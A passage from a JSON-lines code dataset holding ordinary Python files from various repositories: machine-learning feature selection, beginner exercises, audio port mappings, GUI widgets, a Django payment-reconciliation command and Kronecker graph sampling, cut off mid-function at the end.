data['D_126_last'].astype(str)\n\n## Converting to dummies\ndummies = pd.get_dummies(data[['D_63_last', 'D_68_last', 'D_114_last', 'D_116_last', 'D_117_last', 'D_120_last', 'D_126_last']])\n\n## Appeding dummies \ndata = data.drop(columns = ['D_63_last', 'D_68_last', 'D_114_last', 'D_116_last', 'D_117_last', 'D_120_last', 'D_126_last'], axis = 1)\ndata = pd.concat([data, dummies], axis = 1)\n\n## Defining input and target variables\nX = data.drop(columns = ['customer_ID', 'target'], axis = 1)\nY = data['target']\n\n## Spliting the data into train, validation, and test\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.20, stratify = Y)\n\n## Defining the customized scoring function \namex_function = make_scorer(amex_metric, greater_is_better = True, needs_proba = True)\n\n## Defining list to store results\nfeatures_to_select = list()\n\nfor i in tqdm(range(0, 10)):\n \n ## Running RFE with Random forest\n RF_auto_feature = RFECV(estimator = RandomForestClassifier(n_estimators = 50, max_depth = 3), step = 50, scoring = amex_function, min_features_to_select = 10, cv = 3, n_jobs = -1).fit(X_train, Y_train)\n\n ## Appending results \n features_to_select.append(X_train.columns[RF_auto_feature.support_])\n \n## Putting results as data-frame\nfeatures_to_select = pd.DataFrame(features_to_select)\nfeatures_to_select.to_csv('Delinquency_Features_to_select_9.csv', index = False)","repo_name":"Analytics-Data-Science-and-Tech/Analytics_Data_Science","sub_path":"American_Express/Oscar/FS_standard_script.py","file_name":"FS_standard_script.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10855929909","text":"#creat min and max variables\nbiggest = None\nsmallest = None\n#start while loop\nwhile True:\n n = input('> ')\n #exit loop if user enters 'done'\n if n == 'done':\n break\n #check if input is valid, outputs error and returns to top of loop if invalid\n try:\n n = float(n)\n except:\n print('Invalid input')\n continue\n #see if iteration is biggest and save if so\n if biggest is None:\n biggest = n\n elif biggest < n:\n biggest = n\n #see if iteration is smallest and save if so\n if smallest is None:\n smallest = n\n elif smallest > n:\n smallest = n\nprint('Maximum is',str(biggest))\nprint('Minimum is',str(smallest))\n","repo_name":"mikemorton72/py4e","sub_path":"1 Basics/5.2enteredwordcounter.py","file_name":"5.2enteredwordcounter.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26229578500","text":"# 텍스트 파일을 읽어서 내용을 리턴하는 함수를 작성하세요.\n# 매개변수: 파일명\n# 리턴값: 파일의 내용\ndef load(filename):\n try:\n with open(filename, 'rt', encoding='utf-8') as file:\n content = file.read()\n return content\n except:\n return ''\n \ndef save(filename, content):\n with open(filename, 'wt', encoding='utf-8') as file:\n file.write(content)\n \n \ndef main():\n try: \n file_name = 'live.txt'\n content = load(file_name)\n print(content)\n \n # save('live2.txt', content) #<- 이건 파일 복사\n \n \n # 파일 수정후\n text = input('추가할 내용 : ')\n content += text + '\\n'\n save(file_name, content)\n # save(filename)\n except Exception as e:\n print(e)\nmain()","repo_name":"kimvjgd/python","sub_path":"chapter14_file_input_output/ex08.py","file_name":"ex08.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10542676808","text":"def getPortDesc (loops, fx_loops, n_effects, midi_loops):\n\treturn [('capture_1', ['system:capture_1']),\n\t\t\t ('capture_2', ['system:capture_1']),\n\t\t\t #('capture_2', ['system:capture_2']),\n\t\t\t ('playback_1', ['system:playback_1']),\n\t\t\t ('playback_2', ['system:playback_2']),\n\t\t\t #('hydrogen_out', ['Hydrogen', 'out_R']),\n\t\t\t ('aubio_in', ['aubio', 'in']),\n\t\t\t ('amsynth_out', ['amsynth', 'R out']),\n\t\t\t ('fluidsynth_out', ['fluidsynth-midi', 'right']),\n\t\t\t ('drum', ['fluidsynth-midi-01', 'right']),\n\t\t\t ('sl_in', ['Looper:in'])] + \\\n\t\t\t [('sl_out_' + str(i), ['Looper', 'out' + str(i)]) for i in range(loops)] + \\\n\t\t\t [('fx_in_' + str(i), ['effect_' + str(i) + ':in']) for i in range(n_effects)] + \\\n\t\t\t [('fx_out_' + str(i), ['effect_' + str(i) + ':out']) for i in range(n_effects)] + \\\n\t\t\t [('loop_fx_' + str(k) + '_in_' + str(i), ['effect_' + str(((k + 1) * n_effects) + i) + ':in']) for i in range(n_effects) for k in range(fx_loops)] + \\\n\t\t\t [('loop_fx_' + str(k) + '_out_' + str(i), ['effect_' + str(((k + 1) * n_effects) + i) + ':out']) for i in range(n_effects) for k in range(fx_loops)] + \\\n\t\t\t [('fluidsynth_loop_' + str(i), ['fluidsynth-midi-0' + str(i + 2) + ':right']) for i in range (midi_loops)]\n\ndef getPortDescMidi (fx_loops, midi_loops):\n\treturn \t[('korg_in', ['system', 'capture']),\n\t\t\t ('korg_out', ['system', 'playback']),\n\t\t\t ('sl', ['Looper', 'midi_control']),\n\t\t\t ('sl_capture', ['Looper', 'midi_capture']),\n\t\t\t #('hydrogen', ['hydrogen', 'midi', 'RX']),\n\t\t\t ('amsynth', ['amsynth', 'midi_in']),\n\t\t\t ('fluidsynth', ['fluidsynth-midi', 'midi']),\n\t\t\t ('drum', ['fluidsynth-midi-01', 'midi']),\n\t\t\t ('aubio', ['aubio', 'midi_out']),\n\t\t\t ('midimap_in_cc', ['MidiMap', 'in_cc']),\n\t\t\t ('midimap_out_cc', ['MidiMap', 'out_cc-0']),\n\t\t\t ('midimap_in_channel_fx', ['MidiMap', 'in_channel-0']),\n\t\t\t ('midimap_out_channel_fx', ['MidiMap', 'out_channel-0']),\n\t\t\t ('midimap_control_fx', ['MidiMap', 'control-0']),\n\t\t\t ('mod-host-fx', ['mod-host:midi_in'])] + \\\n\t\t\t [('fluidsynth_loop_' + str(i), ['fluidsynth-midi-0' + str(i + 2) + ':midi_00']) for i in range(midi_loops)] + \\\n\t\t\t [('midimap_in_channel_loop_' + str(i), ['MidiMap:in_channel-' + str(i+1)]) for i in range(fx_loops)] + \\\n\t\t\t [('midimap_out_channel_loop_' + str(i), ['MidiMap:out_channel-' + str(i+1)]) for i in range(fx_loops)] #+ \\\n\t\t\t #[('midimap_control_loop_' + str(i), ['MidiMap:control-' + str(i+1)]) for i in range(fx_loops)] #+ \\\n\t\t\t #[('mod-host-loop_' + str(i), ['mod-host-0' + str(i + 1) + ':midi_in']) for i in range(fx_loops)]\n","repo_name":"flappix/raspberry-looper","sub_path":"port_desc.py","file_name":"port_desc.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21995436","text":"\nimport warnings\n\n# Temporarily suppress FutureWarning\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=FutureWarning)\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nimport numpy as np\n\n# In module1.py\nimport sys\nimport os\n\n# Get the absolute path of folder2\ncurrent_dir = os.path.dirname(__file__)\nparent_dir = os.path.join(current_dir, os.pardir)\nfolder2_dir = os.path.join(parent_dir, 'ml_combat')\n\n# Add folder2 to sys.path\nsys.path.append(parent_dir)\n\nfrom ml_combat.MetaModel import MetaModel\nimport ml_combat as ml\n\n###### Start Here ######\nclass NaiveModel(MetaModel):\n \n def __init__(self):\n super().__init__(\"Naive Model\")\n \n def preprocess(self, df):\n \"\"\"\n \"\"\"\n temp_df = df.copy()\n\n return temp_df\n\n def train(self, df):\n \"\"\"\n \"\"\"\n df = self.preprocess(df)\n\n self.model = df.y.mean()\n\n\n def predict(self, df):\n df = self.preprocess(df)\n\n df['y_pred'] = self.model\n\n return df[['ds', 'y_pred']].copy()\n \n\n\ndf = ml.data.get_training_flattened()\n\nfor location in ['A', 'B', 'C']:\n temp_df = df[df['location'] == location]\n\n lr = NaiveModel()\n lr.test(temp_df)\n\nprint(\"Done creating a linear regression model!\")","repo_name":"jacob-a-worsoe/stabekk","sub_path":"models_here_hahah/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31147342531","text":"# function that returns the minimun of 3 numbers\r\n\r\ndef min(num1,num2,num3):\r\n if num1 < num2 and num1 < num3:#check num1\r\n return num1\r\n if num2 < num1 and num2 < num3:#check num2\r\n return num2\r\n if num3 < num1 and num3 < num2:#check num3\r\n return num3\r\n return 0\r\n\r\n\r\ndef main():\r\n print(\"Start\")\r\n n1 = 5\r\n n2 = 9\r\n n3 = 10\r\n minNum = min(n1,n2,n3)\r\n print(\"The min is\", minNum)\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/minNum.py","file_name":"minNum.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35109634337","text":"import tkinter as tk\nfrom PIL import ImageTk, Image\nimport serial.tools.list_ports\nimport serial\n\ndef light_up_button(button):\n button.config(bg='green')\n\ndef turn_off_button(button):\n button.config(bg='black')\n\ndef make_circle(image_path, size):\n image = Image.open(image_path)\n image = image.resize((size, size), Image.ANTIALIAS)\n return ImageTk.PhotoImage(image)\n\ndef get_serial_ports():\n ports = serial.tools.list_ports.comports()\n port_names = [port.device for port in ports]\n return port_names\n\nwindow = tk.Tk()\nwindow.geometry(\"250x400\")\nwindow.configure(background='black')\nwindow.resizable(False, False)\nwindow.title(\"Skrew It Up\")\n\ntitle_logo = make_circle(\"img.png\", 32)\nwindow.iconphoto(True, title_logo)\n\ndef on_button_click():\n global arduino \n selected = selected_port.get()\n print(\"Selected Port:\", selected)\n arduino = serial.Serial(selected, 9600) \n port_dropdown.grid_forget()\n submit_button.grid_forget()\n window.geometry(\"250x350\")\n read_from_arduino() \n\nbutton1_image = make_circle(\"img.png\", 100)\nbutton1 = tk.Button(window, image=button1_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton1.grid(row=0, column=0, padx=10, pady=5)\nbutton1_text = tk.Label(window, text=\"Button 1\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton1_text.grid(row=0, column=1)\nturn_off_button(button1) # Set default state to off\n\nbutton2_image = make_circle(\"img.png\", 100)\nbutton2 = tk.Button(window, image=button2_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton2.grid(row=1, column=0, padx=10, pady=5)\nbutton2_text = tk.Label(window, text=\"Button 2\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton2_text.grid(row=1, column=1)\nturn_off_button(button2) # Set default state to off\n\nbutton3_image = make_circle(\"img.png\", 100)\nbutton3 = tk.Button(window, image=button3_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton3.grid(row=2, column=0, padx=10, pady=5)\nbutton3_text = tk.Label(window, text=\"Button 3\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton3_text.grid(row=2, column=1)\nturn_off_button(button3) # Set default state to off\n\nserial_ports = get_serial_ports()\nselected_port = tk.StringVar()\nselected_port.set(serial_ports[0])\n\nport_dropdown = tk.OptionMenu(window, selected_port, *serial_ports)\nport_dropdown.grid(row=3, column=0, padx=10, pady=10)\n\nsubmit_button = tk.Button(window, text=\"Submit\", command=on_button_click)\nsubmit_button.grid(row=3, column=1, pady=10)\n\ndef read_from_arduino():\n try:\n data = arduino.readline().strip().decode('utf-8', errors='ignore')\n except UnicodeDecodeError:\n print(\"Error decoding data from Arduino\")\n data = ''\n \n if data == '1':\n light_up_button(button1)\n elif data == '2':\n light_up_button(button2)\n elif data == '3':\n light_up_button(button3)\n else:\n turn_off_button(button1)\n turn_off_button(button2)\n turn_off_button(button3)\n \n window.after(1, read_from_arduino) \n\nwindow.mainloop()\n","repo_name":"skrewitup/Project-2-Voltage-Divider","sub_path":"GUI/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43567419444","text":"from PyQt4 import QtCore, QtGui\nfrom xVClient import Sprite, MapRender\nfrom xVLib import Maps\n\nclass TileChooserModel(object):\n \"\"\"\n Model class for a set of tiles in the map editor.\n \n The backend model of a set of tile-like entities in the map editor\n (ie. tiles, items, etc.). Keeps track of which is selected.\n\n Even though the editor uses Qt 4 as the GUI, we're not actually\n bothering with a QtAbstractItemModel implementation here; it's\n way overcomplicated for our purposes, and since we're going ahead\n with writing our own View class anyway, it doesn't make sense.\n \"\"\"\n\n def __init__(self, spriteset=None):\n # Typecheck\n if spriteset != None and not isinstance(spriteset,Sprite.SpriteSet):\n raise TypeError(\"spriteset must be of type Sprite.SpriteSet\")\n\n # Declare the attributes\n self.spriteset = spriteset\n \"\"\"Handle to the tileset to be displayed.\"\"\"\n\n self.selected = 0\n \"\"\"The tile ID that is currently selected.\"\"\"\n\n def SelectTile(self, id):\n \"\"\"\n Selects a tile from the chooser.\n \"\"\"\n # Check if the index is valid\n if id < 0 or id >= len(self.spriteset):\n # Invalid index\n raise IndexError(\"Tile index is out of range\")\n\n # Select the tile\n self.selected = id\n\n def DeselectTile(self):\n \"\"\"\n\t Deselects the selected tile.\n\t \"\"\"\n self.selected = -1\n\n def __len__(self):\n \"\"\"\n Returns the number of tiles in this chooser.\n \"\"\"\n return len(self.spriteset)\n\n\nclass TileChooserView(QtGui.QWidget):\n \"\"\"\n View class for a tile chooser on the left side of the editor.\n \"\"\"\n\n def __init__(self, parent=None, model=None):\n \"\"\"\n Creates a new TileChooserView.\n\n This initializer will optionally accept a handle to a connected\n TileChooserModel object. This can be specified later or switched\n out if the TileChooserModel is not ready at the time of creation.\n And of course, you can pass a QWidget object as a parent object,\n which can be changed later using the standard PyQt4 methods.\n \"\"\"\n # typecheck the model parameter\n if model != None and not isinstance(model, TileChooserModel):\n # invalid object passed as model\n raise TypeError(\"model must be of type TileChooserModel\")\n\n # call the QWidget initializer\n super(TileChooserView, self).__init__(parent)\n\n\n # set up our default resize policies\n resize = QtGui.QSizePolicy()\n resize.setHorizontalPolicy(QtGui.QSizePolicy.Fixed)\n resize.setVerticalPolicy(QtGui.QSizePolicy.Minimum)\n self.setSizePolicy(resize)\n\n # initialize our attributes\n self.model = model\n \"\"\"Handle to the TileChooserModel object this is connected to.\"\"\"\n\n self.ChooserWidth = 5\n \"\"\"Number of tiles across in the chooser.\"\"\"\n\n self.SelectorWidth = 3\n \"\"\"Width, in pixels, of the lines that surround the selection.\"\"\"\n\n # create the pen we use for bordering the selection\n self.selectorPen = QtGui.QPen(QtCore.Qt.white)\n self.selectorPen.setWidth(self.SelectorWidth)\n\n def _GetTileID(self, x, y):\n \"\"\"\n Finds the ID number of a tile given its top-left coordinates.\n \"\"\"\n column = x // Maps.TileWidth\n row = y // Maps.TileHeight\n id = (row * self.ChooserWidth) + column\n return id\n\n def _GetTLFromID(self, id):\n \"\"\"\n Determines the top-left coordinates of a tile given its ID.\n\n This is essentially the inverse operation of _GetTileID(x,y)\n such that _GetTLFromID(_GetTileID(x,y)) = (x,y).\n \"\"\"\n # check if id is valid\n if id >= len(self.model.spriteset):\n raise KeyError(\"tile ID is out of bounds\")\n\n # calculate\n row = id // self.ChooserWidth\n col = id % self.ChooserWidth\n tlx = Maps.TileWidth * col\n tly = Maps.TileHeight * row\n return tlx,tly\n\n def paintEvent(self, event):\n \"\"\"\n Called when the view widget is drawn to a surface.\n\n This is an overloaded method from the QWidget class. It\n is called by the Qt 4 event manager whenever we need to\n draw the widget to something.\n \"\"\"\n # Typecheck, make sure that event is actually a QPaintEvent\n if not isinstance(event, QtGui.QPaintEvent):\n raise TypeError(\"event must be of type QPaintEvent\")\n\n # Set up our drawing system\n r = event.rect()\n painter = QtGui.QPainter()\n whiteBrush = QtGui.QBrush(QtCore.Qt.white)\n painter.begin(self)\n painter.setClipRect(r)\n \n # Clear the rect so we get a clean paint\n painter.setBrush(whiteBrush)\n painter.setPen(QtCore.Qt.NoPen)\n painter.drawRect(r)\n\n # Figure out which tiles must be redrawn\n rect_tlx,rect_tly,w,h = r.getRect()\n tlx, tly = MapRender.GetTileTL(rect_tlx,rect_tly)\n trx, tRy = MapRender.GetTileTR(rect_tlx + w - 1, rect_tly)\n brx, bry = MapRender.GetTileBR(rect_tlx + w - 1, rect_tly + h - 1)\n tiles_wide = (trx - tlx) // Maps.TileWidth + 1\n tiles_high = (bry - tly) // Maps.TileHeight + 1\n \n # Draw the tiles (oh yay, a nested loop)\n must_draw_selection = False\n for tile_across in range(tiles_wide):\n for tile_down in range(tiles_high):\n # figure out what's going on\n tile_x = tlx + (tile_across * Maps.TileWidth)\n tile_y = tly + (tile_down * Maps.TileHeight)\n tile_id = self._GetTileID(tile_x, tile_y)\n\n # check if that tile exists\n if tile_id >= len(self.model.spriteset):\n # doesn't exist\n continue\n\n # draw the tile\n tile = self.model.spriteset[tile_id]\n painter.drawPixmap(tile_x,tile_y,tile.img)\n\n # check if we will need to draw the selection border\n if tile_id == self.model.selected:\n must_draw_selection = True\n\n # do we need to draw the selection border?\n if must_draw_selection:\n # get selection information\n tile_id = self.model.selected\n tile_x, tile_y = self._GetTLFromID(tile_id)\n\n # draw the selection border\n painter.save()\n painter.setPen(self.selectorPen)\n painter.setBrush(QtCore.Qt.NoBrush)\n target = QtCore.QRect()\n target.setX(tile_x)\n target.setY(tile_y)\n target.setWidth(Maps.TileWidth)\n target.setHeight(Maps.TileHeight)\n painter.drawRect(target)\n painter.restore()\n\n # Clean up\n painter.end()\n\n def sizeHint(self):\n \"\"\"\n Calculates the size of the full view widget.\n\n This value is used by Qt 4 to manage the widget when it\n is added to its parent scrollbox.\n \"\"\"\n width = Maps.TileWidth * self.ChooserWidth\n height = Maps.TileHeight * (len(self.model) // self.ChooserWidth + 1)\n return QtCore.QSize(width,height)\n\n def mousePressEvent(self, event):\n \"\"\"\n Called when the mouse button is released after something is clicked.\n\n We overload this method from Qt 4 in order to allow the user to\n select a tile by clicking on it.\n \"\"\"\n # typecheck!\n if not isinstance(event, QtGui.QMouseEvent):\n raise TypeError(\"event must be of type QtGui.QMouseEvent\")\n\n # deselect whatever is currently selected\n prev_id = self.model.selected\n if prev_id != -1:\n # something was selected, clear the selection\n self.model.DeselectTile()\n prev_tlx, prev_tly = self._GetTLFromID(prev_id)\n prev_target = QtCore.QRect()\n prev_target.setX(prev_tlx - self.SelectorWidth)\n prev_target.setY(prev_tly - self.SelectorWidth)\n prev_target.setWidth(Maps.TileWidth * 3)\n prev_target.setHeight(Maps.TileHeight * 3)\n self.repaint(prev_target)\n\n # figure out what was clicked\n clicked_x = event.x()\n clicked_y = event.y()\n tlx, tly = MapRender.GetTileTL(clicked_x, clicked_y)\n id = self._GetTileID(tlx, tly)\n if id >= len(self.model.spriteset):\n # User clicked outside of the tiles, don't select anything\n return\n\n # select the tile and redraw it\n self.model.SelectTile(id)\n target = QtCore.QRect()\n target.setX(tlx - self.SelectorWidth)\n target.setY(tly - self.SelectorWidth)\n target.setWidth(3 * Maps.TileWidth)\n target.setHeight(3 * Maps.TileHeight)\n self.repaint(target)\n","repo_name":"buchwj/xvector","sub_path":"mapeditor/xVMapEdit/TileChooser.py","file_name":"TileChooser.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16625121885","text":"from dataclasses import dataclass\nimport random\n\nfrom .gene import Gene\nfrom .op_sets import OpSets, OpsetKey\n\n\n@dataclass\nclass GeneBuilderConfig:\n num_inputs: int\n num_middlenodes: int\n num_outputs: int\n opset_key: OpsetKey\n\n\nclass GeneBuilder:\n def __init__(self, config: GeneBuilderConfig) -> None:\n self.config = config\n\n def makeGene(self) -> Gene:\n num_inputs = self.config.num_inputs\n middlenodes = [\n self.makeMiddleNode(x) for x in range(self.config.num_middlenodes)]\n output_idx_range = self.config.num_inputs + self.config.num_middlenodes\n output_idxes = [\n random.randrange(output_idx_range)\n for x in range(self.config.num_outputs)]\n return Gene(\n num_inputs,\n middlenodes,\n output_idxes,\n self.config.opset_key)\n\n def makeMiddleNode(self, middleIdx: int) -> tuple[int, int, int, int]:\n maxIdx = self.config.num_inputs + middleIdx\n in1idx = random.randrange(maxIdx)\n in2idx = random.randrange(maxIdx)\n in3idx = random.randrange(maxIdx)\n ops = OpSets.OPSET_DICT[self.config.opset_key]\n op = random.randrange(len(ops))\n return (in1idx, in2idx, in3idx, op)\n","repo_name":"Shalmezad/cgp","sub_path":"cgp/gene/gene_builder.py","file_name":"gene_builder.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14179664406","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom mooring.models import GlobalSettings, MooringAreaGroup\nfrom ledger.payments.bpoint.models import BpointTransaction, BpointToken\nfrom ledger.payments.models import Invoice,OracleInterface,CashTransaction\nfrom ledger.order.models import Order\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom decimal import *\nfrom mooring.emails import sendHtmlEmail\nimport json\n\nfrom datetime import timedelta, datetime\n\nclass Command(BaseCommand):\n help = 'Check BPOINT Settlement dates with oracle Invoice Settlement dates to ensure totals match.'\n\n def handle(self, *args, **options):\n bpoint_total = Decimal('0.00')\n oracle_total = Decimal('0.00')\n invoice_total = Decimal('0.00')\n yesterday = datetime.today() - timedelta(days=1)\n today = datetime.today()# - timedelta(days=41)\n tomorrow = datetime.today() + timedelta(days=1)\n\n system = settings.PS_PAYMENT_SYSTEM_ID\n system = system.replace('S','0')\n bpoint_array = {}\n invoice_array ={}\n mismatch_bpoint = []\n mismatch_invoice = []\n ba_missing = []\n ia_missing = []\n dates_to_check = [yesterday,today,tomorrow]\n\n print (system)\n try:\n for settlement_date in dates_to_check:\n print (\"Settlement Date: \"+str(settlement_date.strftime(\"%d/%m/%Y\")))\n bpoint_total = Decimal('0.00')\n oracle_total = Decimal('0.00')\n invoice_total = Decimal('0.00')\n bpoint_array = {}\n invoice_array ={}\n mismatch_bpoint = []\n mismatch_invoice = []\n ba_missing = []\n ia_missing = []\n\n\n \n print (\"Calculation Bpoint Transaction Total\")\n bpoint_trans = BpointTransaction.objects.filter(settlement_date=settlement_date, crn1__istartswith=system)\n for i in bpoint_trans:\n tran_total = Decimal('0.00')\n if i.action == 'payment':\n bpoint_total = bpoint_total + Decimal(i.amount)\n tran_total = Decimal(i.amount)\n if i.action == 'refund':\n bpoint_total = bpoint_total - Decimal(i.amount)\n tran_total = tran_total - Decimal(i.amount) \n bpoint_array[i.crn1] = tran_total \n\n print (bpoint_total)\n print (\"Calculation Invoice Settlemnt Oracle Totals\")\n\n invoices = Invoice.objects.filter(settlement_date=settlement_date)\n for i in invoices:\n #print (i.reference)\n invoice_total = invoice_total + Decimal(i.amount)\n #print (i.order)\n trans_order_total = Decimal('0.00')\n for ol in Order.objects.get(number=i.order_number).lines.all():\n for order_total in ol.payment_details['order']:\n oracle_total = oracle_total + Decimal(ol.payment_details['order'][order_total])\n trans_order_total = trans_order_total + Decimal(ol.payment_details['order'][order_total])\n #print (Decimal(ol.payment_details['order'][order_total]))\n #print (oracle_total)\n invoice_array[i.reference] = trans_order_total \n print (\"ORACLE TOTAL\")\n print (oracle_total)\n print (invoice_total)\n #bpoint with mismatching invoice\n for ba in bpoint_array:\n if ba in invoice_array:\n if bpoint_array[ba] != invoice_array[ba]:\n mismatch_bpoint.append('Mismatch: '+ba+'('+invoice_array[ba]+')'+'('+bpoint_array[ba]+')')\n else:\n ba_missing.append('BP No exist: '+ba+'('+str(bpoint_array[ba])+')')\n\n # invoice with mismatching bpoint\n for ia in invoice_array:\n #print (ia)\n #print (invoice_array[ia])\n if ia in bpoint_array:\n #print (bpoint_array[ia])\n if invoice_array[ia] != bpoint_array[ia]:\n mismatch_invoice.append('Mismatch: '+ia+'('+invoice_array[ia]+')'+'('+bpoint_array[ia]+')')\n else:\n ia_missing.append(ia+'('+str(invoice_array[ia])+')')\n \n if bpoint_total != oracle_total:\n print (\"Sending Report\")\n context = {\n 'error_report': \"Bpoint and Oracle Totals do not match. Bpoint Total: \"+str(bpoint_total)+\" Oracle Total: \"+str(oracle_total),\n 'mismatch_bpoint': mismatch_bpoint,\n 'mismatch_invoice' : mismatch_invoice,\n 'ba_missing': ba_missing,\n 'ia_missing': ia_missing,\n 'settlement_date': settlement_date\n\n }\n email_list = []\n for email_to in settings.NOTIFICATION_EMAIL.split(\",\"):\n email_list.append(email_to)\n sendHtmlEmail(tuple(email_list),\"[MOORING] oracle and bpoint total mistatch\",context,'mooring/email/oracle_bpoint_report.html',None,None,settings.EMAIL_FROM,'system-oim',attachments=None)\n #raise ValidationError(\"Bpoint and Oracle Totals do not match. Bpoint Total: \"+str(bpoint_total)+\" Oracle Total: \"+str(oracle_total))\n except Exception as e:\n print (\"Error: Sending Email Notification: \"+settings.NOTIFICATION_EMAIL)\n context = {\n 'error_report' : str(e),\n }\n email_list = []\n for email_to in settings.NOTIFICATION_EMAIL.split(\",\"):\n email_list.append(email_to)\n sendHtmlEmail(tuple(email_list),\"[MOORING] oracle and bpoint total mistatch\",context,'mooring/email/oracle_bpoint.html',None,None,settings.EMAIL_FROM,'system-oim',attachments=None)\n\n\n\n","repo_name":"dbca-wa/moorings","sub_path":"mooring/management/commands/check_oracle_bpoint_mi.py","file_name":"check_oracle_bpoint_mi.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18013619280","text":"# https://leetcode.com/problems/binary-gap/description/\n\ndef binaryGap(self, N):\n if N == 0:\n return 0\n else:\n maxDist = 0\n record = 0\n oneBefore = False\n while N > 0:\n resi = N % 2\n if not oneBefore and resi:\n oneBefore = True\n elif oneBefore:\n record += 1\n maxDist = max(maxDist, record)\n if resi:\n record = 0\n N //= 2\n return maxDist\n\n# Faster than 93% of accepted submissions at 40ms ","repo_name":"vincentt117/coding_challenge","sub_path":"lc_binary_gap.py","file_name":"lc_binary_gap.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21492690424","text":"# !/usr/bin/python\n# tested and works as of july\nimport sys\nimport itertools\nimport numpy\n#import pylab as plt\nfrom collections import Counter\nfrom math import factorial\nfrom functools import reduce\nimport numpy\nimport math\nimport timeit\nimport networkx as nx\nfrom collections import defaultdict\n\n# sample_kronecker_fast takes as input\n# K : an n-by-n initiator matrix stored as a list-of-lists\n# P[i][j] is the i, jth element. \n# k : the Kronecker power \n# and returns a set of edges that correspond with a realization\n# of a Kronecker graph\ndef sample_kronecker_fast(K,k):\n array=[]\n # creates the first Erdos-Renyi subregion,\n # an array with k 0's\n n=len(K);\n v = [K[i][j] for j in range(n) for i in range(n)] # vectorize by cols\n edges_mult = []\n for r in regions(v,k): # for each region of the mult. table\n edges_mult.extend(grass_hop_region(r, v)) # get edges in mult. table\n edges_kron = []\n for e in edges_mult: # map edges from mult. table to kron\n edges_kron.append(map_mult_to_kron(e, n))\n return edges_kron;\n\n# update takes as input:\n# n: the dimension of the n x n initiator matrix\n# array: the sequence to be updated\n# and returns the next non-decreasing sequence\ndef update(n, array):\n max = math.pow(n,2)-1;\n if(len(array)==1):\n if(array[0]==max):\n array[0]=-1\n return array\n array[0]=array[0]+1\n return array\n elif(array[len(array)-1]==max):\n place=array[0:len(array)-1]\n place=update(n, place)\n last=place[len(place)-1]\n place.append(last)\n return place\n else:\n array[len(array)-1]=array[len(array)-1]+1\n return array;\n\n# regions takes as input\n# v : a vectorized initiator matrix\n# k : the Kronecker power \n# and returns a list of lists representing all ER subregions\ndef regions(v,k):\n subregions = []; \n array=[]\n for i in range(k):\n array.append(0)\n while(array[0]!=-1):\n subregions.append(list(array));\n array = update(int(math.sqrt(len(v))),array)\n return subregions;\n \n\n# grass_hop_region takes as input\n# r: the subregion to be sampled represented by an array\n# in which the numbers correspond to letters of the subregion \n# v: an n^2 x 1 inititator matrix of probability values represented as a\n# column vector\n# and returns a list of edges represented by multisets of numbers\n# corresponding to letters.\ndef grass_hop_region(r,v):\n n=count_permutations(r);\n collection = []\n # p is the common probability value of the subregion\n p=kron(r,v)\n i=-1\n # a is the geometric random variable or length of the hop\n a=numpy.random.geometric(p)\n while(i<=n-a-1):\n i=i+a\n # finds ith multiset permutation\n thearray=unrank(r,i)\n collection.append(thearray);\n # gets the next geometric random variable or hop length\n a=numpy.random.geometric(p);\n return collection;\n\n\n# kron takes as input:\n# v: an n^2 x 1 iniator matrix of probability values stored as a single\n# column-wise vector\n# r: an array with k elements specifying a cell in the k-space\n# and returns the value at the specified location\ndef kron(r,v):\n n = int(math.sqrt(len(v)));\n final = 1;\n for val in r:\n final = final * v[val]\n return final;\n \n\n# count_permutations takes as input:\n# counter1: any iterable list or multiset\n# and returns the number of permutations of the multiset\ndef count_permutations(counter1):\n counter1=Counter(counter1)\n values = counter1.values()\n return (\n factorial(sum(values))/reduce(lambda a, v: a * factorial(v), values,1)\n )\n\n# unrank takes as input:\n# C: a multiset represented by a list\n# n: the lexicographic rank or index to be found\n# and returns the nth permutation of C in lexicographic order.\n\n# Precondition: C must be in non-decreasing order\n# This function is implemented recursively, so it is not\n# appropriate for extremely long sequences\n\n# Examples:\n# unrank([0,1,1,3], 0) returns [0,1,1,3]\n# unrank([0,1,1,3], 1) returns [0,1,3,1]\n# unrank([0,1,1,3], 2) returns [0,3,1,1]\n\ndef unrank(C, n):\n counter = 0;\n # base 